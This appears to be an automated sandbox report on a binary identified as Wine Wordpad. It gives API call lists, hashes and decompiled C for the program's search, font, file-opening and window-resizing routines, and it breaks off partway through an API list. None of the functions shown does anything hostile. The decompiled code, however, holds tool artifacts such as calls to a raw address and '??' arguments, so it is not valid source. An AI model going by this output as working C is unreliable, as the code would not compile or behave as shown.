lstrlenW.KERNEL32(?,?,*.*,?,000000FF,?,?,*.txt,?,000000FF,?,?,*.txt,?,000000FF), ref: 0040147A
LoadStringW.USER32(?,000006A4,00408A80,000000FF), ref: 0040149D
LoadStringW.USER32(?,000006A5,00408C80,000000FF), ref: 004014AB
LoadStringW.USER32(?,000005B2,00408E80,000000FF), ref: 004014B9
LoadStringW.USER32(?,000005B3,00409080,000000FF), ref: 004014C7
LoadStringW.USER32(?,000005B4,00409280,000000FF), ref: 004014D5
LoadStringW.USER32(?,000005B5,00409480,000000FF), ref: 004014E3

Strings

*.txt, xrefs: 00401415, 00401440
*.*, xrefs: 0040146B
*.rtf, xrefs: 004013E3

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString$lstrcpylstrlen$HandleModule
String ID: *.*$*.rtf$*.txt
API String ID: 3689902871-866740074
Opcode ID: 7c3d186c55add72e87783dc77f9fdea105d70bffaad727173d289a65b54dd698
Instruction ID: f36fb72c716d34a4f6e2b19f5d6b177dcc9174a2c7dc352cd849b5f0a9e2ac20
Opcode Fuzzy Hash: 7c3d186c55add72e87783dc77f9fdea105d70bffaad727173d289a65b54dd698
Instruction Fuzzy Hash: BA31CA31681B24BAE63167149D06F9F3628DFC1B41F410034FE46370D0CFB96E1299AD

Uniqueness

Uniqueness Score: -1.00%

Function 00404195, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 162
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404195(int _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				int _v20;
				WCHAR* _v24;
				signed int _v28;
				void* _v32;
				struct tagMENUITEMINFOW _v80;
				void* _t64;
				struct HMENU__* _t65;
				int _t66;
				signed int _t71;
				signed int _t73;
				WCHAR* _t95;
				signed int _t98;
				int _t105;
				signed int* _t108;
				int _t109;

				_t109 = _a4;
				if(( *(_t109 + 0xc) & 0x00000040) == 0) {
					if(( *(_t109 + 0xc) & 0x00000038) == 0) {
						L23:
						_t64 = 0;
						L24:
						return _t64;
					}
					_t108 =  *(_t109 + 0x1c);
					_t65 = GetMenu( *0x408028);
					_v80.cbSize = 0x30;
					_v80.fMask = 0x20;
					_v80.dwItemData = 1;
					_t66 = SetMenuItemInfoW(_t65, 0x3f7, 0,  &_v80);
					_t95 =  &(_t108[2]);
					if( *(_t109 + 0x10) != _t95) {
						0x400000(_t95);
						lstrcpynW(_t95,  *(_t109 + 0x10), _t66);
						 *(_t109 + 0x10) = _t95;
					}
					SendMessageW( *0x40802c, 0xb0,  &_v12,  &_v8);
					if( *_t108 == 0xffffffff) {
						_t108[1] = _t108[1] & 0x00000000;
						 *_t108 = _v12;
					}
					_t98 = _v12;
					_t105 =  *(_t109 + 0xc) & 0x00000006 | 0x00000001;
					_v24 =  *(_t109 + 0x10);
					_t71 = _v8;
					_a4 = _t105;
					if(_t98 != _t71 && ( *(_t109 + 0xc) & 0x00000030) != 0) {
						_v28 = _t71;
						_v32 = _t98;
						SendMessageW( *0x40802c, 0x47c, _t105,  &_v32);
						_t98 = _v12;
						_t71 = _v8;
						if(_v20 == _t98 && _v16 == _t71) {
							SendMessageW( *0x40802c, 0xc2, 1,  *(_t109 + 0x14));
							SendMessageW( *0x40802c, 0xb0,  &_v12,  &_v8);
							_t71 = _v8;
							_t98 = _v12;
						}
						_t105 = _a4;
					}
					_v32 = _t98;
					if(_t98 != _t71) {
						_v32 = _t98 + 1;
					}
					if(_t108[1] != 0) {
						L18:
						_t73 = lstrlenW( *(_t109 + 0x10)) +  *_t108 - 1;
						_v28 = _t73;
						if(_t73 <= _v32 || SendMessageW( *0x40802c, 0x47c, _a4,  &_v32) == 0xffffffff) {
							 *_t108 =  *_t108 | 0xffffffff;
							EnableWindow( *0x408028, 0);
							E004018DD( *0x408030, 0x6a6, L"Wine Wordpad", 0x2040);
							EnableWindow( *0x408028, 1);
							goto L23;
						} else {
							goto L20;
						}
					} else {
						_v28 = _v28 | 0xffffffff;
						if(SendMessageW( *0x40802c, 0x47c, _t105,  &_v32) != 0xffffffff) {
							L20:
							SendMessageW( *0x40802c, 0xb1, _v20, _v16);
							SendMessageW( *0x40802c, 0xb7, 0, 0);
							if(( *(_t109 + 0xc) & 0x00000020) == 0) {
								goto L23;
							}
							_t64 = E00404195(_t109);
							goto L24;
						}
						_t108[1] = 1;
						_v32 = _v32 & 0x00000000;
						goto L18;
					}
				}
				 *0x408030 =  *0x408030 & 0x00000000;
				 *(_t109 + 0xc) = 8;
				return 0;
			}

0x0040419c
0x004041a3
0x004041c0
0x00404391
0x00404391
0x00404393
0x00000000
0x00404394
0x004041cc
0x004041cf
0x004041d8
0x004041e8
0x004041ef
0x004041f6
0x004041fc
0x00404202
0x00404205
0x00404210
0x00404216
0x00404216
0x00404232
0x00404237
0x0040423c
0x00404240
0x00404240
0x0040424b
0x0040424e
0x00404251
0x00404254
0x00404257
0x0040425c
0x00404264
0x00404277
0x0040427a
0x0040427c
0x0040427f
0x00404285
0x0040429c
0x004042b1
0x004042b3
0x004042b6
0x004042b6
0x004042b9
0x004042b9
0x004042bc
0x004042c1
0x004042c6
0x004042c6
0x004042cd
0x004042f5
0x00404301
0x00404303
0x00404309
0x00404357
0x00404368
0x0040437f
0x0040438f
0x00000000
0x00000000
0x00000000
0x00000000
0x004042cf
0x004042cf
0x004042e8
0x00404324
0x00404335
0x00404346
0x0040434c
0x00000000
0x00000000
0x0040434f
0x00000000
0x00404354
0x004042ea
0x004042f1
0x00000000
0x004042f1
0x004042cd
0x004041a5
0x004041ae
0x00000000

APIs

GetMenu.USER32 ref: 004041CF
SetMenuItemInfoW.USER32 ref: 004041F6
lstrcpynW.KERNEL32(?,?,00000000,?,?), ref: 00404210
SendMessageW.USER32(000000B0,?,?), ref: 00404232
SendMessageW.USER32(0000047C,00000038,?), ref: 0040427A
SendMessageW.USER32(000000C2,00000001,?), ref: 0040429C
SendMessageW.USER32(000000B0,?,?), ref: 004042B1
SendMessageW.USER32(0000047C,00000038,?), ref: 004042E3

Strings

, xrefs: 004041E8
0, xrefs: 004041D8
Wine Wordpad, xrefs: 0040436F

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Menu$InfoItemlstrcpyn
String ID: $0$Wine Wordpad
API String ID: 1065004348-682928632
Opcode ID: 5ce2b6537af64feba5fde8db2177c72fb6cb467f972d9522867103ff64319823
Instruction ID: fc7d56405f2849e07a8bec8d157c686762a68262f81605065a08af22a27d31c8
Opcode Fuzzy Hash: 5ce2b6537af64feba5fde8db2177c72fb6cb467f972d9522867103ff64319823
Instruction Fuzzy Hash: 02516FB1900309EFEB109FA0DD45BAEBBB5FB44314F10822DEA55B62E0C774A958CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402C46, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402C46(void* __fp0, struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				int _v16;
				struct tagPOINT _v28;
				void* _v44;
				struct tagTPMPARAMS _v48;
				struct tagMENUITEMINFOW _v96;
				char _v224;
				struct HWND__* _t39;
				intOrPtr _t40;
				struct HMENU__* _t56;
				struct HWND__* _t64;
				struct HWND__* _t67;
				struct HWND__** _t72;
				struct HWND__* _t74;
				struct HWND__* _t75;
				void* _t87;

				_t87 = __fp0;
				_v12 = GetDlgItem(_a4, 0x7d1);
				_t74 = GetDlgItem(_a4, 0x7d4);
				_v8 = GetDlgItem(_t74, 0x7dd);
				_t64 = GetDlgItem(_t74, 0x7de);
				_t39 = GetDlgItem(_t74, 0x7d3);
				_t72 = _a8;
				_t67 = _t39;
				_t40 = _v8;
				if( *_t72 == _t40 ||  *_t72 == _t64) {
					if(_t72[2] != 0xfffffcda) {
						goto L16;
					}
					if( *_t72 != _t40) {
						if( *_t72 != _t64) {
							goto L16;
						}
						E00404601(_t87, _t64,  &(_t72[5]));
						L15:
						goto L16;
					}
					E004045B1( &(_t72[5]));
					goto L15;
				} else {
					if( *_t72 != _t67) {
						_t75 = _v12;
						if( *_t72 != _t75 || _t72[2] != 0x702) {
							L16:
							return 0;
						} else {
							E004057AA();
							_push(SendMessageW(_t75, 0xba, 0, 0));
							_push(_t72[4]);
							E00405253( &_v224, "selection = %d..%d, line count=%ld", _t72[3]);
							SetWindowTextA(GetDlgItem(_a4, 0x7d0),  &_v224);
							SendMessageW(_a4, 0x400, 0, 0);
							return 1;
						}
					}
					if(_t72[2] == 0xfffffd3a) {
						_t56 = GetMenu(_a4);
						if(_t56 != 0) {
							_v96.cbSize = 0x30;
							_v96.fMask = 4;
							GetMenuItemInfoW(_t56, 0x52d, 0,  &_v96);
							if(_v96.hSubMenu != 0) {
								SendMessageW( *_t72, 0x433, _t72[3],  &_v28);
								MapWindowPoints( *_t72, 0,  &_v28, 2);
								_v48.cbSize = 0x14;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								TrackPopupMenuEx(_v96.hSubMenu, 0x40, _v28, _v16, _a4,  &_v48);
							}
						}
					}
					goto L16;
				}
			}

0x00402c46
0x00402c6a
0x00402c6f
0x00402c7f
0x00402c8a
0x00402c8c
0x00402c8e
0x00402c91
0x00402c93
0x00402c98
0x00402dc5
0x00000000
0x00000000
0x00402dc9
0x00402dd8
0x00000000
0x00000000
0x00402ddf
0x00402de5
0x00000000
0x00402de5
0x00402dcf
0x00000000
0x00402ca6
0x00402ca8
0x00402d47
0x00402d4c
0x00402de6
0x00000000
0x00402d5f
0x00402d5f
0x00402d76
0x00402d77
0x00402d89
0x00402da7
0x00402db7
0x00000000
0x00402dbb
0x00402d4c
0x00402cb5
0x00402cbe
0x00402cc6
0x00402ccf
0x00402cd9
0x00402ce7
0x00402cf0
0x00402d04
0x00402d13
0x00402d19
0x00402d33
0x00402d39
0x00402d3a
0x00402d3b
0x00402d3c
0x00402d3c
0x00402cf0
0x00402cc6
0x00000000
0x00402cb5

APIs

GetDlgItem.USER32 ref: 00402C60
GetDlgItem.USER32 ref: 00402C6D
GetDlgItem.USER32 ref: 00402C77
GetDlgItem.USER32 ref: 00402C82
GetDlgItem.USER32 ref: 00402C8C
GetMenu.USER32(FFFFFD3A), ref: 00402CBE
GetMenuItemInfoW.USER32 ref: 00402CE7
SendMessageW.USER32(?,00000433,?,?), ref: 00402D04
MapWindowPoints.USER32 ref: 00402D13
TrackPopupMenuEx.USER32(?,00000040,?,?,FFFFFD3A,00000014), ref: 00402D3C
SendMessageW.USER32(?,000000BA,00000000,00000000), ref: 00402D74
__swprintf.LEGACY_STDIO_DEFINITIONS ref: 00402D89
GetDlgItem.USER32 ref: 00402DA0
SetWindowTextA.USER32(00000000), ref: 00402DA7
SendMessageW.USER32(00000702,00000400,00000000,00000000), ref: 00402DB7

Strings

selection = %d..%d, line count=%ld, xrefs: 00402D83
0, xrefs: 00402CCF

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$MenuMessageSend$Window$InfoPointsPopupTextTrack__swprintf
String ID: 0$selection = %d..%d, line count=%ld
API String ID: 1971465527-1220190454
Opcode ID: ecd6ff2b9a31d0f04fe7f44ae1516731be8d307e7666bc94870563ee20523c53
Instruction ID: 3912f28a4c9c5c53a5db05d67e8cb9ea4cc7724571e07950e8b19fc920484ec0
Opcode Fuzzy Hash: ecd6ff2b9a31d0f04fe7f44ae1516731be8d307e7666bc94870563ee20523c53
Instruction Fuzzy Hash: 0C41397190020AFFDF10AFA0CD89AAABB79EF15355F104036E605B6190D3B9AD51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404AD7, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 131
memorywindowstringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00404AD7(struct HWND__* _a4) {
				int _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v48;
				signed int _v52;
				void* _v56;
				struct tagLOGFONTW _v148;
				void* _v238;
				void _v260;
				void* _v264;
				struct HDC__* _t64;
				int _t70;
				signed int _t94;
				void* _t96;
				void* _t98;
				signed int _t102;
				signed int _t103;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t64 = GetDC( *0x408028);
				_v20 = SendMessageW(_a4, 0x407, 0, 0);
				_t94 = 1;
				_v148.lfFaceName = 0;
				_v148.lfPitchAndFamily = 0;
				_v148.lfCharSet = 1;
				EnumFontFamiliesExW(_t64,  &_v148, E00403E05,  &_v16, 0);
				qsort(_v16, _v12, 8, E00403E80);
				_t102 = 0;
				if(_v12 > 1) {
					do {
						if(lstrcmpiW( *(_v16 + _t94 * 8),  *(_v16 + _t102 * 8)) != 0) {
							_t102 = _t102 + 1;
							if(_t102 != _t94) {
								_t98 = _v16;
								 *((intOrPtr*)(_t98 + _t102 * 8)) =  *((intOrPtr*)(_t98 + _t94 * 8));
								 *((intOrPtr*)(_t98 + 4 + _t102 * 8)) =  *((intOrPtr*)(_t98 + 4 + _t94 * 8));
								goto L5;
							}
						} else {
							HeapFree(GetProcessHeap(), 0,  *(_v16 + _t94 * 8));
							L5:
							 *(_v16 + _t94 * 8) =  *(_v16 + _t94 * 8) & 0x00000000;
						}
						_t94 = _t94 + 1;
					} while (_t94 < _v12);
				}
				_t37 = _t102 + 1; // 0x2
				_t70 = _t37;
				_v12 = _t70;
				_t103 = 0;
				if(_t70 != 0) {
					do {
						_t96 = _v16;
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						asm("movlpd [ebp-0x20], xmm0");
						_v28 = 0;
						_v56 = 0x21;
						_v52 = _v52 | 0xffffffff;
						_v48 =  *((intOrPtr*)(_t96 + _t103 * 8));
						_v24 =  *((intOrPtr*)(_t96 + 4 + _t103 * 8));
						SendMessageW(_a4, 0x40b, 0,  &_v56);
						HeapFree(GetProcessHeap(), 0,  *(_v16 + _t103 * 8));
						_t103 = _t103 + 1;
					} while (_t103 < _v12);
				}
				HeapFree(GetProcessHeap(), 0, _v16);
				memset( &_v260, 0, 0x70);
				_v264 = 0x74;
				SendMessageW( *0x40802c, 0x43a, 0,  &_v264);
				return SendMessageW(_v20, 0xc, 0,  &_v238);
			}

0x00404aee
0x00404aef
0x00404af0
0x00404af1
0x00404b0d
0x00404b14
0x00404b16
0x00404b1a
0x00404b2c
0x00404b31
0x00404b44
0x00404b4d
0x00404b52
0x00404b54
0x00404b65
0x00404b7e
0x00404b81
0x00404b83
0x00404b8d
0x00404b90
0x00000000
0x00404b90
0x00404b67
0x00404b76
0x00404b94
0x00404b97
0x00404b97
0x00404b9b
0x00404b9c
0x00404b54
0x00404ba1
0x00404ba1
0x00404ba6
0x00404ba9
0x00404bad
0x00404baf
0x00404baf
0x00404bb2
0x00404bb5
0x00404bba
0x00404bbf
0x00404bc2
0x00404bcc
0x00404bd0
0x00404bd7
0x00404be7
0x00404bf7
0x00404bfd
0x00404bfe
0x00404baf
0x00404c0e
0x00404c1e
0x00404c26
0x00404c43
0x00404c58

APIs

GetDC.USER32(?), ref: 00404AF1
SendMessageW.USER32(?,00000407,00000000,00000000), ref: 00404B0B
EnumFontFamiliesExW.GDI32(00000000,?,00403E05,?,00000000), ref: 00404B31
qsort.MSVCRT ref: 00404B44
lstrcmpiW.KERNEL32(?,?), ref: 00404B5D
GetProcessHeap.KERNEL32(00000000,?), ref: 00404B6F
HeapFree.KERNEL32(00000000), ref: 00404B76
SendMessageW.USER32(?,0000040B,00000000,00000021), ref: 00404BE7
GetProcessHeap.KERNEL32(00000000,?), ref: 00404BF0
HeapFree.KERNEL32(00000000), ref: 00404BF7
GetProcessHeap.KERNEL32(00000000,?), ref: 00404C07
HeapFree.KERNEL32(00000000), ref: 00404C0E
memset.MSVCRT ref: 00404C1E
SendMessageW.USER32(0000043A,00000000,00000074), ref: 00404C43
SendMessageW.USER32(?,0000000C,00000000,?), ref: 00404C52

Strings

!, xrefs: 00404BC2
t, xrefs: 00404C26

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$MessageSend$FreeProcess$EnumFamiliesFontlstrcmpimemsetqsort
String ID: !$t
API String ID: 4088889356-1615765830
Opcode ID: 07571842324001bda64dff14b0921a655ec36d969744145370b97a42f781c944
Instruction ID: 44989adfd617529de470834f5e7b547c06fb6899833f3d39f471f239d6ae2a81
Opcode Fuzzy Hash: 07571842324001bda64dff14b0921a655ec36d969744145370b97a42f781c944
Instruction Fuzzy Hash: E5416C71D00208BFDB10DFE4CD84B9EBBB9FF48300F114169E606B71A1D770AA648B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404C59, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00404C59(struct HWND__* _a4) {
				struct HDC__* _v8;
				long _v12;
				void* _v20;
				unsigned int _v24;
				long _v52;
				void* _v56;
				void* _v146;
				signed int _v160;
				void _v168;
				void* _v172;
				long _t42;
				void* _t49;
				signed int _t60;
				struct HWND__* _t65;
				signed int _t66;
				void* _t67;
				void* _t68;

				_t65 = GetDlgItem(GetDlgItem( *0x408028, 0x7d4), 0x7dd);
				_t1 =  &_a4; // 0x405859
				_v12 = SendMessageW( *_t1, 0x407, 0, 0);
				_v8 = GetDC( *0x408028);
				memset( &_v168, 0, 0x70);
				_t68 = _t67 + 0xc;
				_v172 = 0x74;
				SendMessageW( *0x40802c, 0x43a, 1,  &_v172);
				_v56 = 0x20;
				_v52 = SendMessageW(_t65, 0x158, 0xffffffff,  &_v146);
				SendMessageW(_t65, 0x40d, 0,  &_v56);
				_t42 = SendMessageW(_a4, 0x14b, 0, 0);
				if((_v24 & 1) == 0 || _v52 == 0) {
					_t66 = 0;
					0x400000(0x4062c8);
					if(_t42 != 0) {
						do {
							_t49 = E0040377C(_a4,  *((intOrPtr*)(0x4062c8 + _t66 * 4)));
							_t66 = _t66 + 1;
							0x400000(0x4062c8);
							_t68 = _t68 + 0xc;
						} while (_t66 < _t49);
					}
				} else {
					E0040377C(_a4, MulDiv(_v24 >> 0x10, 0x48, GetDeviceCaps(_v8, 0x5a)) & 0x000000ff);
				}
				_t60 = 0x14;
				asm("cdq");
				wsprintfW( &_v20, L"%2d", _v160 / _t60);
				return SendMessageW(_v12, 0xc, 0,  &_v20);
			}

0x00404c85
0x00404c90
0x00404c9b
0x00404ca6
0x00404cb2
0x00404cb7
0x00404cba
0x00404cd8
0x00404ce0
0x00404cf2
0x00404d01
0x00404d13
0x00404d1c
0x00404d54
0x00404d57
0x00404d5f
0x00404d61
0x00404d6b
0x00404d71
0x00404d72
0x00404d77
0x00404d7a
0x00404d61
0x00404d24
0x00404d46
0x00404d4c
0x00404d86
0x00404d87
0x00404d94
0x00404db1

APIs

GetDlgItem.USER32 ref: 00404C75
GetDlgItem.USER32 ref: 00404C7D
SendMessageW.USER32(YX@,00000407,00000000,00000000), ref: 00404C93
GetDC.USER32 ref: 00404C9E
memset.MSVCRT ref: 00404CB2
SendMessageW.USER32(0000043A,00000001,00000074), ref: 00404CD8
SendMessageW.USER32(00000000,00000158,000000FF,?), ref: 00404CF0
SendMessageW.USER32(00000000,0000040D,00000000,00000020), ref: 00404D01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00404D13
GetDeviceCaps.GDI32(?,0000005A), ref: 00404D29
MulDiv.KERNEL32(?,00000048,00000000), ref: 00404D39

Part of subcall function 0040377C: wsprintfW.USER32 ref: 00403799
Part of subcall function 0040377C: SendMessageW.USER32(?,0000040B,00000000,?), ref: 004037B6

wsprintfW.USER32 ref: 00404D94
SendMessageW.USER32(?,0000000C,00000000,?), ref: 00404DA8

Strings

%2d, xrefs: 00404D8E
YX@, xrefs: 00404C90

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Itemwsprintf$CapsDevicememset
String ID: %2d$YX@
API String ID: 1623705836-1835664884
Opcode ID: 2931ebd548db700bf715e2309c626568778596557dcdea4a8e830bb9e169b7b6
Instruction ID: 66a21869a5fa238445fb778a75a65fc8c9d712cdc2c0ca4b233d072ecf104f3f
Opcode Fuzzy Hash: 2931ebd548db700bf715e2309c626568778596557dcdea4a8e830bb9e169b7b6
Instruction Fuzzy Hash: 2331B3B1A40218BFEB109BA0ED45F9E7B78AF04701F104136FA05BA1E1DBB99A548B58

Uniqueness

Uniqueness Score: -1.00%

Function 004014EA, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121
windowfilestringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004014EA(void* __ecx, WCHAR* _a4) {
				long _v8;
				char _v15;
				void _v16;
				intOrPtr _v20;
				void* _v28;
				long _t42;
				intOrPtr* _t51;
				intOrPtr* _t53;
				void* _t54;

				_t54 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t54 != 0xffffffff) {
					ReadFile(_t54,  &_v16, 5,  &_v8, 0);
					SetFilePointer(_t54, 0, 0, 0);
					__eflags = _v8 - 2;
					if(_v8 < 2) {
						L8:
						__eflags = _v8 - 5;
						if(_v8 < 5) {
							L6:
							_v28 = _t54;
							_v20 = E0040529B;
							E00403847();
							 *0x408010 = 1;
							E00404F21(__eflags);
							E0040502E();
							SendMessageW( *0x40802c, 0x449, 1,  &_v28);
							CloseHandle(_t54);
							SetFocus( *0x40802c);
							E00404F82(_a4);
							lstrcpyW(0x408050, _a4);
							SendMessageW( *0x40802c, 0xb9, 0, 0);
							0x400000(_a4,  *0x408028);
							return E004057AA();
						}
						_t51 = "{\\rtf";
						_t53 =  &_v16;
						__eflags =  *_t51 -  *_t53;
						if( *_t51 !=  *_t53) {
							L12:
							__eflags =  *0x4062c4 - _v16;
							if( *0x4062c4 != _v16) {
								goto L6;
							}
							CloseHandle(_t54);
							return E004018DD( *0x408028, 0x6aa, L"Wine Wordpad", 0x30);
						}
						__eflags = ( *(_t51 + 4) & 0x000000ff) -  *((intOrPtr*)(_t53 + 4));
						if(( *(_t51 + 4) & 0x000000ff) !=  *((intOrPtr*)(_t53 + 4))) {
							goto L12;
						}
						_push(2);
						_pop(1);
						goto L6;
					}
					__eflags = _v16 - 0xff;
					if(_v16 != 0xff) {
						goto L8;
					}
					__eflags = _v15 - 0xfe;
					if(_v15 != 0xfe) {
						goto L8;
					}
					_push(0x11);
					_pop(1);
					SetFilePointer(_t54, 2, 0, 0);
					goto L6;
				}
				_t42 = GetLastError();
				asm("sbb eax, eax");
				return MessageBoxW( *0x408028,  ~(_t42 - 5) + 0x6ae, L"Wine Wordpad", 0x30);
			}

0x0040150f
0x00401514
0x0040154e
0x0040155a
0x00401560
0x00401564
0x00401619
0x00401619
0x0040161d
0x0040158e
0x0040158e
0x00401591
0x00401598
0x0040159d
0x004015a3
0x004015a8
0x004015c3
0x004015c6
0x004015d2
0x004015db
0x004015e9
0x004015fe
0x00401609
0x00000000
0x00401610
0x00401623
0x00401628
0x0040162d
0x0040162f
0x00401642
0x0040164c
0x0040164e
0x00000000
0x00000000
0x00401655
0x00000000
0x00401672
0x00401635
0x00401638
0x00000000
0x00000000
0x0040163a
0x0040163c
0x00000000
0x0040163c
0x0040156a
0x0040156e
0x00000000
0x00000000
0x00401574
0x00401578
0x00000000
0x00000000
0x0040157e
0x00401580
0x00401588
0x00000000
0x00401588
0x00401516
0x00401523
0x00000000

APIs

CreateFileW.KERNEL32(004033FC,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00403400,7741BB20,00000000,?,?,004033FC,00000000), ref: 00401509
GetLastError.KERNEL32(?,?,004033FC,00000000), ref: 00401516
MessageBoxW.USER32(-000006B3,Wine Wordpad,00000030), ref: 00401536
ReadFile.KERNEL32(00000000,?,00000005,00000000,00000000,?,?,004033FC,00000000), ref: 0040154E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,004033FC,00000000), ref: 0040155A
SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000), ref: 00401588
SendMessageW.USER32(00000449,00000001,?), ref: 004015C3
CloseHandle.KERNEL32(00000000), ref: 004015C6
SetFocus.USER32 ref: 004015D2
lstrcpyW.KERNEL32 ref: 004015E9
SendMessageW.USER32(000000B9,00000000,00000000), ref: 004015FE
CloseHandle.KERNEL32(00000000,?,?,004033FC), ref: 00401655

Strings

{\rtf, xrefs: 00401623
Wine Wordpad, xrefs: 00401525, 0040165D

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Message$CloseHandlePointerSend$CreateErrorFocusLastReadlstrcpy
String ID: Wine Wordpad${\rtf
API String ID: 39220724-1294181941
Opcode ID: 1a1fdb1242a28a9ac29a5df1116a95782bafd734c9538f43ab14129519693838
Instruction ID: 3f867c8a0ad194af5f233fea6c1807a61e609d855555c1515555c18ae14f54ac
Opcode Fuzzy Hash: 1a1fdb1242a28a9ac29a5df1116a95782bafd734c9538f43ab14129519693838
Instruction Fuzzy Hash: B0411631640104BFEB10AB60EE0AF6E3F39EB45724F11417AFA42B90E0CB754955DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DED, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00402DED(void* __eax, struct HWND__* _a4, char _a8, signed int _a12) {
				struct HWND__* _v8;
				signed int _v12;
				char _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct tagRECT _v40;
				struct HWND__* _t26;
				struct HWND__* _t27;
				int _t35;
				signed int _t41;
				struct HWND__* _t48;
				struct HWND__* _t49;
				struct HWND__* _t50;
				struct HWND__* _t51;

				_t41 = 0;
				0x400000();
				_t51 = _a4;
				if(__eax == 0) {
					_push(0x7d1);
				} else {
					_push(0x7e0);
				}
				_v8 = GetDlgItem(_t51, ??);
				_v16 = GetDlgItem(_t51, 0x7d0);
				_t26 = GetDlgItem(_t51, 0x7d4);
				_v20 = _t26;
				_t27 = GetDlgItem(_t26, 0x7df);
				_v12 = _v12 & _t41;
				_t7 =  &_v16; // 0x405955
				_t48 =  *_t7;
				_v24 = _t27;
				if(_t48 != 0) {
					SendMessageW(_t48, 5, 0, 0);
					if(IsWindowVisible(_t48) == 0) {
						_t41 = 0;
					} else {
						GetClientRect(_t48,  &_v40);
						_t41 = _v40.bottom - _v40.top;
					}
				}
				_t49 = _v20;
				if(_t49 != 0) {
					_t35 = SendMessageW(_t49, 0x41b, 0, 0);
					_v12 = _t35;
					MoveWindow(_t49, 0, 0, _a12 & 0x0000ffff, _t35, 1);
				}
				_t50 = _v8;
				if(_t50 != 0) {
					GetClientRect(_t51,  &_v40);
					MoveWindow(_t50, 0, _v12, _v40.right, _v40.bottom - _v12 - _t41, 1);
				}
				0x400000(_v24);
				_t22 =  &_a8; // 0x405955
				return DefWindowProcW(_t51, 5,  *_t22, _a12);
			}

0x00402df6
0x00402df8
0x00402dfd
0x00402e08
0x00402e11
0x00402e0a
0x00402e0a
0x00402e0a
0x00402e1f
0x00402e2a
0x00402e2d
0x00402e35
0x00402e38
0x00402e3a
0x00402e3d
0x00402e3d
0x00402e40
0x00402e45
0x00402e4e
0x00402e5d
0x00402e72
0x00402e5f
0x00402e64
0x00402e6d
0x00402e6d
0x00402e5d
0x00402e74
0x00402e79
0x00402e85
0x00402e9a
0x00402e9d
0x00402e9d
0x00402ea3
0x00402ea8
0x00402eaf
0x00402ec9
0x00402ec9
0x00402ed2
0x00402edb
0x00402eeb

APIs

GetDlgItem.USER32 ref: 00402E17
GetDlgItem.USER32 ref: 00402E22
GetDlgItem.USER32 ref: 00402E2D
GetDlgItem.USER32 ref: 00402E38
SendMessageW.USER32(UY@,00000005,00000000,00000000), ref: 00402E4E
IsWindowVisible.USER32(UY@), ref: 00402E55
GetClientRect.USER32 ref: 00402E64
SendMessageW.USER32(?,0000041B,00000000,00000000), ref: 00402E85
